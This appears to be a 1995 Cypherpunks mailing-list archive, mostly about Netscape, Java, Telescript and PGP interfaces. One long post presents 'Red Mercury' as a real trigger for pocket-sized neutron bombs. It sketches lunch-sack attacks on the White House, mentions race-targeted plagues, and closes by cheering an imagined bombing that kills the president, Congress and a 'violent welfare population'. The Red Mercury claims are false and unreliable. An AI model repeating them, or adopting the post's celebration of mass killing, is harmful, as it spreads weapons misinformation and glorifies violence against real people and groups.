all-in-one programs so preferable to using the windowing > capabilities that are built into every X-window, Mac or Windows system? > > Why not use the best mail client, another best webcrawler, and yet another > news reader? [snip] > With components, it wouldn't be hard to have a universal > Encryption/Signature module. It would get arround any propriatary > restriction that vendors may or may not try to enforce ("can Netscape be > extended or not" becomes moot). > > Is clicking on another icon really too hard? Um, thats what I do on my Mac. The smoothness of Internet Config+Newswatcher +IceTEE+Eudora+Anarchie is beautiful to watch - I command-click a URL while reading mail and the right app magically takes care of everything. [begin annoyed complaints here] If only MacPGP were so easy. MacPGP is such a pain in the ass for me that I'm 90% done configuring a Linux box so I can sign/encrypt without hassle. There are other planned uses for valkyrie, of course, but the triggering factor is encryption. I'd much rather keep PGP and my keys on my Duo that I take everywhere, but that'd be too easy. First I had troubles with it crashing my machine, then it wouldn't extract keys, then it would extract keys but my buddy with the dos machine couldn't import them (and yes, I had it set to ascii armor them). The litany goes on and on. I suspect that it is RamDoubler that MacPGP hates, but am unwilling to give it up - I *need* that extra 12MB for work. I'm not a moron; I got it working well enough under DOS to have taught several friends to use it, it just doesn't like my Mac. Does anyone have any information on when 3.0 is going to be released? I'd rather fight with a buggy new version than a buggy old version that will be superceded RSN. I'm also interested from an OpenDoc standpoint - I just got the OpenDoc DR2 CD and would really like to make a PGP aware OpenDoc container. I have time to code now, but won't after September. From tcmay at sensemedia.net Thu Jul 20 13:43:57 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 20 Jul 95 13:43:57 PDT Subject: Netscape the Big Win Message-ID: At 8:23 PM 7/20/95, Jon Lasser wrote: >And from what I've heard about HotJava (not seen it yet, can't comment >strongly) there needs another jump in PC power before it would be useful >at the home level. Part of why we were stuck with DOS for so long is >that it was what got the job done when the revolution happened. For that >reason, I agree that HTML/Integrated browser solutions are what we're >looking at, and at the same time don't have strong hopes for HotJava, >though I would like to see it succeed. Just to clarify, you mentioned "useful at the home level." I can't speak for Ray, but I certainly didn't mean HotJava (or PowerObjects, or OpenDoc, or Agents tools, etc.) would be used at "the home level." Such tools would likely be used at the programming level. As to HotJava itself, who knows? It's one of several tooks coming along. The key is that folks--millions of them at last count--are voting with their feet that they want the ball of wax that is "The Web" (Netscape or Mosaic, HTML, HTTP, browsers, automated handling of images and sounds, integrated Newsreaders and mailers, etc.). They, the millions of users, demonstrably don't want to mess with Linux, or FreeBSD, or PGPelm, or even simple, straight text PGP (that is, PGP not integrated with mailers, just standalone). They want ease-of-use and a semantically simple model of how things work. (This is why I like Lisp Machines when I programmed them for Intel, and why I was an early adopter of the Macintosh, and why Windows has been doing so well...and why Netscape is doing spectacularly well.) This is not an "OS War" I'm taking sides in, just simple truth about what people are buying, using, clamoring for. It's important to our longer-range goals to recognize these important trends, like them or not. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From rjc at clark.net Thu Jul 20 13:45:51 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 20 Jul 95 13:45:51 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <199507202044.QAA14974@clark.net> Tim May wrote: > I am sorry that some folks heavily committed to the Linux route, or to > Emacs, or to GNU/FSF, or to other approaches feel that their work is > technically superior and deserves to be as popular as Netscape and simiar > approaches, but reality is reality. > > (And I could be wrong on the way things will unfold. All I'm saying is that > technology is a moving target, that plans have to change, and that ease of > use will likely win out over technical sophistication. Folks who think the > stronger technology will inevitably win should pick up a copy of a > 15-year-old book called "The Soul of a New Machine," by Tracy Kidder.) I agree wholeheartedly with this. When General Magic first released the Telescript white paper, I was really hot for the technology. I tried to become a developer, I sent mail to every General Magic employee on the net I saw posting (one guy even CC'ed me accidentally to his manager saying they should hire me). I did searches in the media for any mention of it. Harry Hawk even had dinner with the VP of Product Development at General Magic. Alas, they would not give out alphas/betas of the development environment, which is all the same, because they don't know how to market Telescript and make it a defacto standard. Instead of charging for the interpreter/server, they should have given away the servers and development stuff for free, or near free, and made their money by selling services and clients (personal digital assistants using Magic Cap and Telescript). The result is that no one uses Telescript except AT&T. If I had gotten my hands on Telescript, I would have wasted lots of time and effort on a failed product (failed in my eyes, because of its potential) [lesson: proprietary programming languages fail unless they come embedded within a killer consumer application] Then I got into Safe-Tcl, which is a little more promising, but still a failure because there was no "killer app" which used it and which would encourage its incorporation into other servers and clients. HTML would have failed were it not for Mosaic. I was on the Web when it only had a line mode browser and it was about as exciting as Gopher. I think Sun has taken the right approach with Java. Giving out Alphas and Betas for free with source code. Encouraging heavy porting, and incorporating it into a "killer app" (HotJava). They will make money by licensing and selling tools and environments for Java, but their biggest success will be that it will become the defacto "enabled content" language. Java still lacks what Telescript has (the ability to checkpoint execution state and migrate execution across servers seamlessly), but what Telescript has that Java doesn't isn't enough to make people wait for it, or pay lots of money to be developers for. I could be wrong about how successful Java will be, but my confidence factor is high. -Ray From sandfort at crl.com Thu Jul 20 13:46:24 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 20 Jul 95 13:46:24 PDT Subject: RANT GENERATORS In-Reply-To: <9507202028.AA05535@snark.imsi.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Geez Louise, what is going on with all this blah, blah about fooling our elected representatives (hah) with electronic form letters? If the proponents of this ill-conceived idea had spent half as much time actually writing to their congress-entities as they put into this silly debate . . . S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From rjc at clark.net Thu Jul 20 14:01:05 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 20 Jul 95 14:01:05 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <199507202059.QAA18820@clark.net> Jon Lasser wrote: > And from what I've heard about HotJava (not seen it yet, can't comment > strongly) there needs another jump in PC power before it would be useful > at the home level. Part of why we were stuck with DOS for so long is > that it was what got the job done when the revolution happened. For that > reason, I agree that HTML/Integrated browser solutions are what we're > looking at, and at the same time don't have strong hopes for HotJava, > though I would like to see it succeed. HotJava runs fine on a 486/33 with 16mb running WinNT 3.5. 486s are pretty much standard. 1995 and '96 will be "the year of the pentium" Entry level systems are now Pentium 90s with PCI and 64-bit video. Pentium 120 systems now cost less than my 486/66 system did a year ago. HotJava is compiled into efficient byte-code with the option to be translated to machine code at run time. This is the same principle behind the Newton. Since the majority of the CPU time is spent in native-C code function calls to the user interface, and network latency is high, the "slow" interpreted code is hardly noticed. In fact, I wouldn't call the Java runtime slow, it beats the performance of many Lisp interpreters which have been adequate for "home" users. (e.g. Emacs Lisp) HotJava is not meant for writing applications to decode MPEG in real time. It's best use is for interactivity on web pages. It doesn't take a powerhouse of CPU to put up a slider, "sleep" for an event, and they call a ScrollList() routine. There's going to be a huge use of Java for doing sales catalogs and online ordering on the web. > most PC users like "pretty" better. And they made the best "pretty" > software. Netscape software is not just a pretty user interface, it also has the best layout algorithms I've seen of browsers. That's some pretty hefty dynamic programming there. Mosaic and Arena frequently produce poor or incorrectly formatted pages. (or less optimal pages than I've seen Netscape) -Ray From patl at catfish.lcs.mit.edu Thu Jul 20 14:12:29 1995 From: patl at catfish.lcs.mit.edu (Patrick J. LoPresti) Date: Thu, 20 Jul 95 14:12:29 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <199507202112.RAA21906@catfish.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- >>>>> "tcmay" == Timothy C May writes: tcmay> Seriously, the world is what the world is. I really don't care tcmay> about "FSF" one way or the other, and will join the rest of tcmay> the world (apparently) in using Netscape. I am not ignoring the reality of the situation. I was not arguing with your main point, which was that Netscape is going to take over the world. We all agree on that, I think. My point was that your criticism of existing efforts is inappropriate. I submit that the tools you marginalize are more responsible for current PGP usage than everything you have ever written combined. (I intend no more offense with my comments than you do with yours; I am just trying to make my point.) tcmay> And yes, I am "marginalizing" the work that anyone does on tcmay> "fringe" projects like Linux, which will likely always remain tcmay> in the ghetto of Unix hackers who want a cheap Unix running on tcmay> their cheap 486 boxes...it just ain't gonna take over inside tcmay> corporations or amongst the many folks like me. (Tangential point) I think you underestimate Linux, which has an installed base of a million or so systems. But that is a different topic entirely. tcmay> Frankly, one of the great boons of my current setup is that I tcmay> can completely get away from Unix tools and commands, away tcmay> from my Unix shell account at Netcom, away from the arcane tcmay> commands that vary from program to program, away from tin and tcmay> elm and emacs...my fingers are already forgetting the emacs tcmay> commands! (Another tangential point, and blatant plug) To verify a PGP signature from within Emacs, I click on the "Mailcrypt" menu bar item and select "Verify Signature". When I lack the public key of the signer, Mailcrypt offers to fetch it for me from BAL's Web interface. I answer "y", and a few seconds later I see the output of PGP on the public key (so I can check the key signatures). I confirm that I want to add the key to my ring, and then the original signature check completes. It isn't Netscape, but it isn't rocket science, either. I agree, though, that no matter what the interface looks like, it won't be adopted by the masses if it doesn't run on Windows and Macintosh. tcmay> And the newsreader is a matter of taste...it does all I want tcmay> it to do, and I'm a fairly heavy reader of News and tcmay> contributor to Usenet groups. I survived with "tin" for tcmay> several years, so anything is possible. (Yet another tangential point) If you ever try a news reader with score files, I think you would be converted. Especially adaptive score files. tcmay> I don't think the packages I "denigrate" are the key to the tcmay> future widespread use of crypto. Look at the actual usage tcmay> patterns. Yes, look at the current usage patterns for PGP. It's far from being everyone, but it is even farther from being no one. Existing interfaces do make a difference. tcmay> Please, your insulting tone ("your musings," "try writing some tcmay> code..") is uncalled for. You have your views, I have mine. Point taken. You just seemed to be playing the armchair quarterback, telling developers that they are wasting their time when they are, in fact, doing everything they can do at present. Nevertheless, we are, I think, largely on the same team. I apologize for my tone. When it becomes feasible to do what you are asking for Netscape, I am sure that someone will do it. At the moment, it is largely out of our hands, since the Netscape interface is totally controlled by Netscape Communications... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface iQCVAwUBMA7GqHr7ES8bepftAQEOAwQA0fYoxk1u8lZOUuHRYE+m0ZHpXAQ33mGB nS4ifVWIW+XLRyVX9Cb3AQbGHottoLt7kYnAmxXuSClCYvwFoC9yTV7aFM7Pe0gj HHutvRbfd/Cqa8mqW3HnKfDLX9ZYWOX4b9Y5x5tfw6cVpPphHV98Jj18bP72I2vh +fDUbNlVuEY= =KeI1 -----END PGP SIGNATURE----- From patl at catfish.lcs.mit.edu Thu Jul 20 14:37:03 1995 From: patl at catfish.lcs.mit.edu (Patrick J. LoPresti) Date: Thu, 20 Jul 95 14:37:03 PDT Subject: "Cypherpunks Write Code" as a Putdown In-Reply-To: Message-ID: <199507202136.RAA22319@catfish.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- I have already explained my comments in another thread, but I figure I should respond to this anyway. >>>>> "tcmay" == Timothy C May writes: tcmay> At 5:25 PM 7/20/95, Patrick J. LoPresti wrote: >> If it is ever feasible to do what you suggest, someone will do it; >> your musings will have no effect on that. If you want to make a >> difference, try writing some code yourself... tcmay> In my posting on why I think Netscape and related operating tcmay> environments represent the likeliest targets for widespread tcmay> crypto use (the "big win" I used in my title), I did not whine tcmay> that others ought to write code for me. I said that this is tcmay> where users were going in massive numbers. That is not all you said; you also suggested that existing interfaces for "Tin, Pine, Elm, Joe, Emacs, etc." were a waste of time. tcmay> Take it or leave it, as an analysis, but the "try writing some tcmay> code" is a meaningless insult. I have apologized for the insulting tone, but I do not feel the comment was meaningless. If you are going to criticize my development efforts, I think it is fair for me to ask, "And what have *you* done?" The point being, of course, that the criticism itself is unwarranted; not to make a meaningless insult. tcmay> In short, the insulting tone of many Cypherpunks these days is tcmay> saddening. It was a specific response to an insult of my (and others') work. Again, I apologize. tcmay> I plan to continue to speak my mind, to point out what I think tcmay> are the more important routes to a desirable future, and to tcmay> criticize what I think are dead ends and ghettoized tcmay> approaches. I would hope you would keep the forward-looking vision while ditching the critical tone. Those "ghettoized approaches" are the best we have at present, and they are responsible for the widespread use of PGP, such as it is. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface iQCVAwUBMA7MWnr7ES8bepftAQHgRQP+O60BcHGWSiUETnePX9DrzDKOBfA7VNPB 900twzEO+o21RVBGMePn3zCc2Z70ejsKmgndH/EN74SWt9Ot03BWyWzIFj67BVua GhWhuyeBXTBGe3ZzfKFTmNUqKNQocj5UxD6CDj/2O5powYjYLCzKBHZTI3UGyE57 MjBY/YclZRw= =FPXO -----END PGP SIGNATURE----- From gjeffers at socketis.net Thu Jul 20 14:51:40 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Thu, 20 Jul 95 14:51:40 PDT Subject: DOVE/Red Mercury doom U.S. Super State? Message-ID: <199507202345.SAA24056@mail.socketis.net> DOVE/Red Mercury dooms U.S Super State? The first part of this post deals with Red Mercury. The remainder deals generally with cheap weapons of mass destruction and their proliferation amoung small groups. Red Mercury means Antimony Mercury Oxide. This compound looks rather harmless but it is not. This compound is very technically difficult to synthesize in its dangerous state. I suspect that the compound is more complex than its formula suggests. According to Spin magazine, it is not exactly an explosive but goes through a chemical transformation that releases MUCH more power (energy/time) than high explosives. It was discovered in Russia and is currently being produced there. DOVE is a code name for an American device that would have used Red Mercury. The unique property of Red Mercury is that it releases so much power that it can be used as a trigger for miniature fusion bombs! And appar- ently has been. Most of this material is from a booklet by Dr. Gary North, called BILLS FROM BEYOND THE GRAVE - chapter 7 - Khomeini's Bill. This booklet is a recent promotional for North's REMNANT REVIEW. Remnant Review 824 East Baltimore Street Baltimore, MD 21202 The following text is mostly information quoted from North's booklet in which he gets his info from Sam Cohen - The man who came up with the idea of the neutron bomb in the late 1950's. --------------------start North---------------------------- -------- The DOVE project was active at least since 1958 at the Livermore nuclear weapon laboratory. "The proposed device was part of the lab's peaceful explosive program, e.g., underground drilling & exploration. It contained no fissionable material. That is, it was not detonated by an atomic bomb. It was to be composed of deuterium & tritium: heavy hydrogen which is used in the hydrogen bomb. It would have the effect of 10 tons of TNT. It would have been an extremely low-yield weapon." Cohen concluded that it would also serve as a weapon. It would kill enemy troops with radiation out to several hundred yards, but without the destruction of buildings and without serious radioactive contamina- tion. These devices, if practical, could be turned out by the hundreds at very low nuclear cost, since they contained no fissionable material. Here was a completely different approach to neutron bombs. Not long after, he told a key Presidential advisor about it. This man has been a high-level advisor in the field of nuclear disarmament for half a century. The man understood the problem: if such a weapon could be built, any nuclear-proliferation treaty would become unenforceable- a nightmare in his view. As Cohen told me, shortly thereafter he was forbidden access to this project, which the government killed by 1960. Meanwhile, the Soviet Union's research program continued. Even before Liverpool began its research, the USSR had been involved in a similar project. A 1957 paper by a Soviet weapon designer described experiments done in 1952. In 1961, a Soviet colonel described in Red Star the mili- tary effects of such devices. Cohen realized that the Soviets were not talking about DOVE; they were developing it. Now jump ahead about three decades. In 1992, Russian General Ye Negin stated that Russia had begun producing low-yield nuclear devices, but double what previous tactical nuclear weapons have been. He stated that this had been accomplished with a hundredfold reduction in weight. Cohen cites a 1990 statement by Viktor Mikhailov, who is now the Russian Minister of Atomic Energy: "You can drop a couple of hund- red little bombs on foreign territory, the enemy is devastated, but for the aggressor there are no consequences." This means the Soviets - now called Russians - developed the long- missing trigger: the detonation technology. Cohen calls this new material Red Mercury: an antimony, mercury oxide. But U.S. intelligence services have officially denied that any relevant evidence for such a device exists. Remember this rule: "No rumor should be considered true till its denied." A NEUTRON BOMB IN A LUNCH SACK In my interview with Cohen, he described eating his lunch in the park across the street from the White House, just a few hundred yards away. If a tritium-based, red-mercury detonated device exists, he speculated, it would weigh perhaps five pounds. A person could sit down on a park bench, casually eat his lunch (or pretend to), deposit the lunch sack in a trash can, and walk away. At some predetermined moment, the bomb would explode. Everyone above ground in the White House would be killed. So would most people within several hundred yards of the explosion in every direction. His other scenario is similar: a brown paper bag deposited between the two World Trade buildings in New York City. Tens of thousands of people could die. The issue here is terrorism. These devices could be tested in under- ground ficilities. They would give off no detectable radiation above ground when exploded. Their low-level explosive force could not be moni- tured. The killing power of these devices is not in the force of the explosion. It is the neutrons that do the damage. They also blow out computers: electromagnetic pulsation (EMP). Because they are very light and undetectable, these devices could be smuggled easily across a border. Hide one in a coffee can. How cheaply could they be produced? Cohen cannot be sure since he does not know the precise nature of the detonating mechanism. But even at the cost of $1 million or more, this would be irrelevant compared with the consequences. A DOVE is a cheap weapon. THE GOVERNMENT HAS TO DENY THIS STORY The government faces two problems. (1) The 1968 Non- Proliferation Treaty does not deal with tritium. It deals only with fissionable materials, e.g. plutonium. (2) The Anti-Ballistic Missile (ABM) defense treaty is now threatened. By exploding a DOVE-type weapon in the atmo- sphere, a defensive-minded nation could disrupt incoming nuclear missiles. When detonated, these DOVE devices give off virtually no detectable radiation: no fissionable material. Any terrorist nation could test such a device, and the West would not know about it. This means that the two key nuclear war-related treaties of the U.S. are tech- nologically dead. They can be violated at will. The State Department dares not admit this. ---------------------------end North------------------------ -------- North thinks that Iran will be the country that attacks the U.S. with these bombs. SOME MORE REFERENCES TO RED MERCURY ---------------------start---------------------------------- -------- Fool's mercury. (synthesized red mercury created by Promecologia) The Economist, May 22, 1993 v327 n7812 p76(1). Abstract: Promecologia claims to be able to synthesize red mercury, and it has a $24.2 billion deal to sell the mercury to API International. But this deal has gone awry, because of accusations that the sale is only an attempt to launder money. Companies: Promecologia - Contracts API International - Contracts AN: 13768250 -------------------------end-------------------------------- ------ ----------------------------start--------------------------- -------- ... But only fools still hunt for elusive red mercury. New Scientist, June 06, 1992 v134 n1824 p10(1). Author: William Brown Subjects: Mercury compounds - Reports Fraud in science - Reports Gov't Agencies: United States. Department of Energy - Reports AN: 12747905 (This may be a disinformation article. Gary Jeffers) --------------------------end------------------------------- ----- --------------------------start----------------------------- ---- Black holes of red mercury. (views of Gennady Brubulis, retired State Secretary) Moscow News, August 13, 1993 n33 p11(1). Author: Vladimir Orlov Abstract: The existence of "red mercury," a mercury antimonite that is produced and exported by the USSR to countries such as the US, France, and Iraq for use in the manufacturing of nuclear weapons, is investi- gated and analyzed. The substance is a brownish-steel power or a red liquid, and costs between 320 and 380 dollars per gram. Russian chemists and other specialists in the US Department of Energy have denied the existence of this substance. Subjects: Mercury - Research AN: 14519163 (Its probable that this article is in English. Gary Jeffers) ------------------------------end--------------------------- --------- An article titled Red Mercury was printed in (I'm pretty sure) Spin magazine some time ago. >From WAR AND ANTI-WAR by Alvin and Heidi Toffler - Warner Books ----------------------Start--------------------------------- --------- WALL STREET AND WARLORDS All this leads some pessimists to doubt that nuclear arms can be controlled at all. Few match the gloom of Carl Builder, a statigic analyst at the RAND Corporation. Builder's pessimism is regarded as extreme by many of his colleagues, but as the first director of nuclear safeguards for the U.S. Nuclear Regulatory Commission, he can hardly be dismissed. At one time Builder was totally responsible for the security of all nuclear materials in civilian hands in the United States, some of it bomb-grade stuff. The main problems of the future, he believes, will not arise from nation-states at all, but from those we called "global gladiators" in our book POWER SHIFT. These are terror organizations, religious move- ments, corporations, and other nonnational forces - many of whom, he says could gain access to nuclear weaponery. Listening to him one imagines the Irish Republican Army announcing that it has accquired its own nuclear bomb. A call to the BBC warns that "if British troops do not evacuate Northern Ireland withing seventy- two hours, a nuclear device will..." The bumblers who devastated parts of New York's World Trade Center might have oblierated Wall Street had someone cleverer supplied them with a tactical nuke. Someday, Builder believes, even outfits like the Medellin cocaine cartel may be able to build their own nuclear weapons. According to a report in The Economist, "There have already been more than 50 attemps to extort money from America with nuclear threats, some frighteningly credible." Worse yet, to the current list of possible threats an additional one, largely overlooked, now has to be added. Not only governments, terrorists, and drug barrons, but warlords may now be searching for nuclear weapons. There are, often ignored by the arms-control community, private armies in many parts of the world under the control of local business-cum- political thugs. The equivalent of warlords can be found from the Philippines to Somalia and the Caucasus, wherever central government control is weak. More and more of these private armies are spinging up as the national forces of the old Soviet Union disintegrate. Moreover, there are reasons to believe that mafia-like business groups in Russia today, feed, house, cloth, and control whole units of the former Red Army. In short, private armies, mercenaries, and First Wave warlordism are all making a comeback. The idea of nuclear weapons under the control of these local generalissimos should send a sudder down our collective spine. Builder's proliferation scenario, however, forces us to confront the extreme. Like gunpowder, he says, "Nuclear weapons are going to diffuse.. I'm going to go even further and say, even if not in my lifetime, per- haps, but in the forseeable future, [that they] are going to proliferate down to individuals. It will be possible for an individual to make a nuclear device from materials which are in commerce." Mafia families, Branch Davidian cultists, archaeo- Trotskyite group- uscules, Sendero Luminoso Maoists, Somalian or Southeast Asian warlords, Serbian Nazis, and even, perhaps, individual loonies could hold whole nations at ransom. Worse yet, Builder believes, "An opponent cannot be deterred by the threat of nuclear weapons if that opponent has no defin- able society to threaten." Thus, he says, a "terrifing asymmetry" looms ahead. --------------end of WAR AND ANTIWAR------------------------ ----------- Another threat is cheap biological warfare. A few years ago in a popular science magazine, a scientist was describing the near future threat of biological weapons. Amoung the things he stated was 1. while only two sites in the world house smallpox samples, its genome is known and it can be made in a gene sequencer. 2. As bio science advances, plagues can be manufactured by smaller groups of people. 3. A plague could be tailored to strike only a certain racial group in only a particular part of the world. The part of the world described by humi- dity, temp., climate, etc.. CONCLUSION The world is not going to be dominated by a one world state. Tech- nology dictates that weapons of mass destruction are going to find their way into the hands of smaller and smaller groups. No longer will giant states be able to say "you do what I say." Sort of a "Don't tread on me" world. "God created man. Samuel Colt made men equal." - AND cheap weapons of mass destruction will make political entities equal regardless of size. Other books that pretty much reach these conclusions are: The GREAT RECKONING by James Dale Davidson and Lord William Rees- Mogg Simon & Schuster; BLOOD IN THE STREETS by same writters; and BASEMENT NUKES by Erwin S. Strauss - Loompanics Unlimited. Relevance to CYPHERPUNKS: Weaponery decides size of viable independent political groups & their degree of independence. This will decide much of the nature of private communications. Also, Cypherpunks was sort of down about the increasing control of the U.S. superstate. I think this will cheer them up. & Finally: In the old Feudal days, wars weren't so bad. The nobility would fight while the peasants watched nearby & cheered the sport. Won't it be just grand when we sit in front of our tv's with cherry cokes & popcorn & watch the "horrible" news reports of the destruction in Washington D.C. in which the dreaded two-headed Clinton monster was killed and various paramilitary headquarters, the IRS, Congress, lobbyists, lawyers, the Federal Reserve and a violent welfare population were destroyed. Set VCRs on record! PUSH EM BACK! PUSH EM BACK! WWWAAAYYY BBBAAACCCK! BBBEEEAAATTTT STATE! Gary Jeffers From cman at communities.com Thu Jul 20 15:22:46 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 20 Jul 95 15:22:46 PDT Subject: Netscape the Big Win Message-ID: Tim -- HotJava is a web browser that happens to be written in a language called Java, that runs on top of the Java Virtual Machine, which is part of what gives this combination of tools the high degree of platform independence we've been talking about. JVM is the thing that is currently being ported to different platforms both by Sun and by others. Also, there is the Abstract Windowing Toolkit, which provides a set of platform-independent, browser-embeddable GUI tools. HotJava is the first (and certainly won't be the last) web browser that allows you to have small Java programs (called applets) as an HTML document type. These are obtained by the browser in the same way it obtains a GIF, but they are interpreted and run on the client machine. A Java program is compiled into Java bytecodes, which have certain properties that prevent them from, say, breaking out of their address space, playing cute games with the CPU, etc. Applets are composed of bytecodes. Most of the existing applets do stuff like 3D models you can rotate with the mouse, irritating animations, and enhancements to forms technology, but Java is a general-purpose language -- one of the most impressive applets I saw initially was a spreadsheet, plonked down in the middle of a web page. Admittedly, it was a really stupid spreadsheet, but it did a good job of convincing me that you could really do anything with this stuff. I don't get what you mean when you say, "Java isn't ready for the home market." True, I don't think that programming languages of any sort are part of the "home market", but I think that Java will enable people like cypherpunks to write extremely portable applications _once_ that will be embeddable on web pages viewed by browsers like Netscape. I can't think of anything that is going to come closer to your definition of "winning" the home market. Certainly the home market will be dominated in short order by Win 95 and MacOS (mostly the former.) I think the Win 95 port of the Java environment is only awaiting release of Win 95, and the MacOS port has been demoed around town. Also, Java is entirely orthogonal to issues like particular protocols or formats, in the same sense the C or Smalltalk are orthogonal to those same issues. It's just that we will be able to embed access to those protocols and formats into the popular tools without huge porting nightmares, or even requiring much cooperation from the vendors themselves, who are often limited politically by what they can put in themselves. From pgf at tyrell.net Thu Jul 20 15:37:14 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 20 Jul 95 15:37:14 PDT Subject: Java (was Netscape: the big win) In-Reply-To: Message-ID: <199507202231.AA15197@tyrell.net> Does anyone here have any figures on how much memory Java takes up when running its typical tasks? Phil From pgf at tyrell.net Thu Jul 20 15:37:47 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 20 Jul 95 15:37:47 PDT Subject: And another thing... Message-ID: <199507202233.AA15359@tyrell.net> As usual, one final question came to mind right after sending the last message: Why is Java the next hot thing instead of Telescript? Was Telescript ever opened up for general use or was it mainly used for AT&T's Personalink network? Phil From cman at communities.com Thu Jul 20 15:42:05 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 20 Jul 95 15:42:05 PDT Subject: It had to happen... Message-ID: Has anyone caught this yet? From "No Such Agency" to having their own Web page... wow. http://www.nsa.gov:8080/ From pgf at tyrell.net Thu Jul 20 15:42:33 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 20 Jul 95 15:42:33 PDT Subject: Investigate Your Federal Building :) In-Reply-To: Message-ID: <199507202226.AA14478@tyrell.net> You know, if you see Moulder or Scully, tell them I said hi. From ab411 at detroit.freenet.org Thu Jul 20 15:54:40 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Thu, 20 Jul 95 15:54:40 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507202254.SAA11508@detroit.freenet.org> Ray Arachelian writes: >On Thu, 13 Jul 1995, Bill Stewart wrote: >> >> ["virus hackers"] >> >> ... What viruses have to >> do with encryption is that encryption makes it easier to prevent viruses, >> and Senator Grassley wants to stop that. > >Erm, not quite. Stealth viruses supposedly use "encryption" to hide >themselves.... Perhaps he was referring to the use of (cryptographically strong) hashes to implement integrity checking? Or authentication of software distribution channels? >Still, you could write beneficial viruses, or virus like programs that >are beneficial in nature in some way. KOH for instance? The problem is, it's awfully hard to come up with a case where a beneficial virus can't be replaced with a similar program that has the same features, but lacks the ability to copy itself. KOH is a good example. There are plenty of good encryption programs out there, so what is the advantage to making it a virus? Precious little. On the other hand, problems crop up, like: What if there are bugs in it? How do you "call it back" and replace it with a bugfixed version? How does someone know, when it shows up on their machine, that it is still the original beneficial program, and hasn't been turned into something malicious? This is pretty far off the subject for Cypherpunks, though. (I suppose it could come with a PGP signature, the key being well-known, and that would both answer the question of whether it'd been modified as well as tie this back into cpunks. :) -- David R. Conrad, ab411 at detroit.freenet.org, http://web.grfn.org/~conrad/ Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From pgf at tyrell.net Thu Jul 20 16:01:28 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 20 Jul 95 16:01:28 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <199507202257.AA17742@tyrell.net> Tim May wrote: Just to clarify, you mentioned "useful at the home level." I can't speak for Ray, but I certainly didn't mean HotJava (or PowerObjects, or OpenDoc, or Agents tools, etc.) would be used at "the home level." Such tools would likely be used at the programming level. The tools you mention are either interpreted or gain their functionality when used at the "home" level. OLE (gag me with a forklift!) seems to be used more by users to integrate their own environments together because the programmers forgot to. Just speaking as a humble and frustrated Windows 3.1 user. Phil From lmccarth at cs.umass.edu Thu Jul 20 16:11:21 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 20 Jul 95 16:11:21 PDT Subject: "Cypherpunks Write Code" as a Putdown In-Reply-To: Message-ID: <9507202311.AA12637@cs.umass.edu> Tim May writes: > Take it or leave it, as an analysis, but the "try writing some code" is a > meaningless insult. [more good comments elided] Agreed. I concur with Tim's further comments, which I've omitted, on the meaning of "Cypherpunks write code". It's clear that the qualifications for being a critic (in the constructive sense) of activity XYZ differ from the requirements for doing XYZ, in the general case. This is the old "Oh, if you're so smart, let's see you do it better" from elementary school. Absurd. One of the primary sources of this dispute is, I think, the fact that c'punks have widely divergent target markets in mind. I was rather surprised to observe this at the last Bay Area physical meeting. Sandy moderated a prognostication session on the future of cryptoanarchy, etc. Towards the end, he asked each person to offer his/her definition of "victory" in the cryptoanarchic program. Some people were adamant that privacy would need to be widely protected across society for them to consider the project a success. Others essentially asserted that they'd be content with what I'll call "the cypherpunk community" enjoying free access to privacy-preserving tools. The various *n*x crypto tools go a long way toward satisfying one market, yet don't appear to help much with another market. So they constitute a "big win" for some c'punks, while remaining largely irrelevant for others. It would behoove c'punks on all sides not to take umbrage at others' embracing different goals. It would be great to hear persuasive arguments as to why "we" should adopt your plan, but "we" are under no obligation to be convinced, or to place any particular value on the achievement of aims we don't share with you. The significant segregation of software developers and software users onto different platforms makes the disunity of purpose much more of an issue than it would be otherwise. A conscious effort must be exerted to ensure that tools developed for the cognoscenti ;) have a chance to run on the machines owned by the rest of the multiverse. For my money, this is the best feature of platform-independent languages, etc. Ideally, Java and such will afford me the opportunity to write code for, say, the Macintosh, which could compete with native code, without my having to break down and use a Mac (gag). On a related note, this summer I've broken down and found myself developing software in Tcl under VMS. (I'm typing this on a VAXstation 4000 VLC.) Bob Snyder has recommended exmh here before, a highly MIME- and PGP-aware mailer for *n*x which is apparently built with Tcl/Tk. Apart from the discussions of possibly using Safe-Tcl for remailers, I haven't seen much talk of using Tcl/Tk for crypto apps here. Can anyone point me in the direction of work on this front, or towards reasons why Tcl/Tk seems like a poor choice ? I'm still pretty 